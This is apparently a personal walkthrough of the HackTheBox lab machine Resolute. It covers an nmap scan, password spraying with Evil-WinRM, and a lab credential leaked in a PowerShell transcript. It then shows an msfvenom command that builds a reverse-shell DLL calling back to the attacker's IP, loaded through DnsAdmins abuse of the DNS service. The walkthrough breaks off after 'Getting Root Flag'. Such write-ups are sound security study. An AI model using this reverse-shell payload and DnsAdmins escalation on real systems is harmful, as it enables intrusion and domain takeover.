This post provides a walkthrough of the Resolute system on HackTheBox. User part is basic enumuration. Root part is so much fun. I learned new things about privilege escalation.
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
kali@0xOE:~/Desktop|⇒ nmap -T4 -A -v 10.10.10.169
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-27 07:00 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:00
Completed NSE at 07:00, 0.00s elapsed
Initiating NSE at 07:00
Completed NSE at 07:00, 0.00s elapsed
Initiating NSE at 07:00
Completed NSE at 07:00, 0.00s elapsed
Initiating Ping Scan at 07:00
Scanning 10.10.10.169 [2 ports]
Completed Ping Scan at 07:00, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:00
Completed Parallel DNS resolution of 1 host. at 07:00, 0.01s elapsed
Initiating Connect Scan at 07:00
Scanning 10.10.10.169 [1000 ports]
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 3268/tcp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 3269/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Completed Connect Scan at 07:00, 4.87s elapsed (1000 total ports)
Initiating Service scan at 07:00
Scanning 11 services on 10.10.10.169
Completed Service scan at 07:02, 87.04s elapsed (11 services on 1 host)
NSE: Script scanning 10.10.10.169.
Initiating NSE at 07:02
Completed NSE at 07:02, 14.83s elapsed
Initiating NSE at 07:02
Stats: 0:02:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 3 (3 waiting)
NSE Timing: About 96.59% done; ETC: 07:03 (0:00:03 remaining)
Completed NSE at 07:04, 120.46s elapsed
Initiating NSE at 07:04
Completed NSE at 07:04, 0.00s elapsed
Nmap scan report for 10.10.10.169
Host is up (0.082s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-27 11:10:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/27%Time=5E7DDCF6%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h29m34s, deviation: 4h02m30s, median: 9m34s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-03-27T04:12:02-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-27T11:12:03
|_ start_date: 2020-03-27T05:42:21
NSE: Script Post-scanning.
Initiating NSE at 07:04
Completed NSE at 07:04, 0.00s elapsed
Initiating NSE at 07:04
Completed NSE at 07:04, 0.00s elapsed
Initiating NSE at 07:04
Completed NSE at 07:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.93 seconds
Enum4linux
Then I used the enum4linux. I got the password and domain users. 
password :Welcome123!
I use Evil-WinRM to establish as shell with domain users. I tried all usernames one by one. And I got a user flag with melanie:Welcome123!
Privilege Escalation
When I check the users on system. I saw ryan and I dont have permission to access. I search ryan's credentials on system. For this I use dir -force command. -force help us the show hidden files. 
I found this PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt on this directory C:\PSTranscripts\20191203
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command";
value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command";
value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
We can see user’s creds ryan:Serv3r4Admin4cc123!. We can can use Evil-WinRM to establish as shell as the ryan.
As we can see ryan was part of the DnsAdmins groups. I search DnsAdmins to Domain admins methods. There are many blogs on this topic From DnsAdmins to SYSTEM to Domain Compromise.
Create Payload
1
2
3
4
5
kali@0xOE:~|⇒ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LPORT=7878 LHOST=10.10.14.187 -f dll > /home/kali/onur.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes
When I upload the dll on machine with Evil-WinRM upload method. dll deleted.Probably windows defender is active. I use other method SMB sharing. For this I use impacket.
Smb Sharing 
I reconfigure the dns service to use my onur.dll as the serverlevelplugin.dll and then restart the dns service. 
Getting Root Flag
